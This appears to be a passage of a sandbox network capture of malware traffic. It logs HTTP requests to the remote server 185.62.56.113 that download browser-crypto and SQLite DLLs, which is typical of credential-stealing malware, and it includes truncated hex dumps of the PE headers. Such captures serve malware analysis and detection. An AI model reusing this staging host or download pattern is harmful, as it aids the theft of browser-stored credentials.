                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a2 00 10 a0 a2 00 10 80 a2 00 10 e0 a2 00 10 90 a3 00 10 30 a3 00 10 10 a3 00 10 70 a3 00 10 30 a4 00 10 d0 a3 00 10 b0 a3 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL(["!(`@@Agr?=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B0p0
                                            Jun 26, 2022 09:36:23.756582975 CEST3701OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1
                                            Content-Type: text/plain;
                                            User-Agent: record
                                            Host: 185.62.56.113
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jun 26, 2022 09:36:23.807020903 CEST3703INHTTP/1.1 200 OK
                                            Server: nginx/1.14.0 (Ubuntu)
                                            Date: Sun, 26 Jun 2022 07:36:23 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 80128
                                            Connection: keep-alive
                                            Last-Modified: Sat, 28 May 2022 16:52:46 GMT
                                            ETag: "6292535e-13900"
                                            Accept-Ranges: bytes
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 27 00 00 02 e0 27 00 00 02 60 2d 00 00 02 e0 32 00 00 02 40 34 00 00 02 70 35 00 00 02 b0 36 00 00 02 28 39 00 00 01 f8 39 00 00 01 04 3b 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL(["!0t(@A? 8 @.text `.data@.idata@@.rsrc@@.reloc @B0''`-2@4p56(99;
                                            Jun 26, 2022 09:36:24.429677963 CEST3785OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1
                                            Content-Type: text/plain;
                                            User-Agent: record
                                            Host: 185.62.56.113
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jun 26, 2022 09:36:24.482574940 CEST3787INHTTP/1.1 200 OK
                                            Server: nginx/1.14.0 (Ubuntu)
                                            Date: Sun, 26 Jun 2022 07:36:24 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 627128
                                            Connection: keep-alive
                                            Last-Modified: Mon, 11 Apr 2022 14:39:36 GMT
                                            ETag: "62543da8-991b8"
                                            Accept-Ranges: bytes
                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 53 57 56 83 ec 08 89 ce 8b 5d 08 a1 0c 30 09 10 31 e8 89 45 f0 53 e8 8a 14 08 00 83 c4 04 89 c7 8b 46 14 39 f8 73 30 83 ec 0c 8a 45
                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL9b"!V/@AcQ,pr4CWh0.text `.rdata0@@.data0@.00cfgP @@.tls`"@.rsrcp$@@.reloc4CD.@BUSWV]01ESF9s0E
                                            Jun 26, 2022 09:36:25.453722954 CEST4444OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1
                                            Content-Type: text/plain;
                                            User-Agent: record
                                            Host: 185.62.56.113
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jun 26, 2022 09:36:25.500905037 CEST4446INHTTP/1.1 200 OK
                                            Server: nginx/1.14.0 (Ubuntu)
                                            Date: Sun, 26 Jun 2022 07:36:25 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 684984
                                            Connection: keep-alive
                                            Last-Modified: Mon, 11 Apr 2022 14:40:08 GMT
                                            ETag: "62543dc8-a73b8"
                                            Accept-Ranges: bytes
                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 32 19 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 07 19 08 00 83 c4 04
                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL&9b"!6@A4,S,xT8$&0.D.text `.rdata0@@.data<F@&@.00cfg(@@.rsrcx*@@.reloc8$&.@BUhO2t8]h
                                            Jun 26, 2022 09:36:26.363410950 CEST5166OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1
                                            Content-Type: text/plain;
                                            User-Agent: record
                                            Host: 185.62.56.113
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jun 26, 2022 09:36:26.410998106 CEST5167INHTTP/1.1 200 OK
                                            Server: nginx/1.14.0 (Ubuntu)
                                            Date: Sun, 26 Jun 2022 07:36:26 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 254392
                                            Connection: keep-alive
                                            Last-Modified: Mon, 11 Apr 2022 14:39:58 GMT
                                            ETag: "62543dbe-3e1b8"
                                            Accept-Ranges: bytes
                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 8c 02 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 e8 7b 03 10 83 c4 08 85
                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL'9b"!@AtvSw5hqD{.textV `.rdata@@.data~@.00cfg@@.rsrc@@.reloc56@BUt]h6h{
                                            Jun 26, 2022 09:36:26.868189096 CEST5432OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1
                                            Content-Type: text/plain;
                                            User-Agent: record
                                            Host: 185.62.56.113
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jun 26, 2022 09:36:26.917299032 CEST5433INHTTP/1.1 200 OK
                                            Server: nginx/1.14.0 (Ubuntu)
                                            Date: Sun, 26 Jun 2022 07:36:26 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 1099223
                                            Connection: keep-alive
                                            Last-Modified: Mon, 11 Apr 2022 12:28:56 GMT
                                            ETag: "62541f08-10c5d7"
                                            Accept-Ranges: bytes
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 